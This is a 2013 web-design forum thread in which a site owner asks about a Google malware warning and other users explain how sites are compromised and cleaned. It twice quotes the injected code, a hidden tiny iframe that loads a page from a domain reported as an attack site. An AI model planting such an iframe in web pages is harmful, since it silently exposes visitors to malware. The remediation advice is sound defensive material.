website with suspected injection code

**coachjimgil** · 23 February 2013, 02:36 AM

Below is a message I received on Google on a page of my website:

When Google last tested this page, your server returned content that directed the browser to a site that serves malware. Below is an example of suspected injected code. We recommend you check your source code for this and any other unauthorized changes, and reference our guidelines for cleaning your site and requesting a review.

Here is the suspected injected code:

<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://stateexpressindia.com/wmaf.html?i=1513991>

My server host company told me that it could be a java exploit through Xara Web Designer MX Premium software.

Has anyone else had this problem?

**steve.ledger** · 23 February 2013, 02:46 AM

Xara Web Designer doesn't use any Java (unless you have added some via placeholders etc?)

**Abikadabra** · 23 February 2013, 08:16 AM

Originally Posted by coachjimgil

Below is a message I received on Google on a page of my website:

When Google last tested this page, your server returned content that directed the browser to a site that serves malware. Below is an example of suspected injected code. We recommend you check your source code for this and any other unauthorized changes, and reference our guidelines for cleaning your site and requesting a review.

Here is the suspected injected code:

<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://stateexpressindia.com/wmaf.html?i=1513991>

My server host company told me that it could be a java exploit through Xara Web Designer MX Premium software.

Has anyone else had this problem?

I can tell you exactly what this is coachjimgil. I had the same thing happen with a client's website. It you look carefully at the code you will see a domain hidden in there stateexpressindia.com . If you open that you will get a screen that will tell you what this site actually is attempting to do to your own site. This is what you will find if you visit stateexpressindia.com :

Reported Attack Page!
This web page at stateexpressindia.com has been reported as an attack page and has been blocked based on your security preferences. Attack pages try to install programs that steal private information, use your computer to attack others, or damage your system.Some attack pages intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.

AND THIS IS ALSO WHAT YOU WILL FIND IF YOU CLICK ON THE BUTTON - Why was this page blocked? http://safebrowsing.clients.google.c...ressindia.com/

Sometimes code is inserted by these sheisters to gain a higher page ranking for clients that they have charged for SEO services. They highjack your site and when people try to click to other pages on your site they are directed to someone else's site.

It may be an idea to use Filezilla to ftp into your host and check if there are any errant files that do not belong to your site. I found more than 1000 web pages on my clients file manager on her host, and none of them had anything to do with her. Her site lost its page one ranking with google and I had to reapply to be able to use her domain and site. It took 7 weeks before google would index her site again and consider that she was not part of this malicious link farming instigated by a scam Indian SEO website (in this case, not State Express India but one like them).

You will need to respond to google if you want to keep your site from being dropped by them in the next couple of weeks. But before you respond to them, remove all errant code and any errant files. Good luck! Abi

**ckh** · 23 February 2013, 01:54 PM

I've seen this more often than most probably have. Most of the time, a person logged in via ftp, downloaded a bunch of files, then probably ran a program that does a mass insert of the malicious code to the files, then uploaded them again to the website. The other common way is a script with a vulnerability installed on the site. I've seen this in a lot of word press third party plugins/themes. It allows the hacker to upload a malicious script that basically gives them file access via the browser.

Usually the cause of the problem is a keylogger/spyware installed on a computer of a person that had ftp access to the site. I always recommend to the client to do a full virus scan of their computer with a good up-to-date virus scanner and after fixing the problem, change the ftp password.

You can normally find the files that are compromised by looking at the file dates. The file dates of the files that were compromised should all have the same date and almost same time stamp. Sometimes htm/html extensions are the ones they got, sometimes php or js extensions, sometimes all of them.

Usually the same code is injected in all the files and it's normally at the very end of the file. For a few files, it's not too hard to remove, but, if you have hundreds of files, it gets rather monotonousness and if you have a search and replace program installed on your computer, you should be able to use it to remove all the code similar to how the hacker put it in.

Another way is if your host has a backup, many do backups daily. Some retain more than one backup. If they have a backup older than the date the site was compromised, they may restore the files for you.

Of course, if you have your own backup also, you may use that to overwrite the infected files.

Some hosting control panels have a virus scanner in them. It's great for finding malicious files and also sometimes finds files that have been injected with malicious code. It may give a delete and/or quarantine option for files it finds, but, I just like it for finding them quickly so I know what files to investigate.

Your host may also give you access to ftp logs. These are great for a few reasons. It allows you to see what files were downloaded/uploaded, the IP address of the hacker (which is often just a proxy/infected computer/infected server and not very meaningful) but you should also see the IP address of the legitimate user that last logged in before the hacker to give you a clue to whose computer may be infected. I've seen the hacker login anywhere from a few days to a few weeks after the legit user logged in.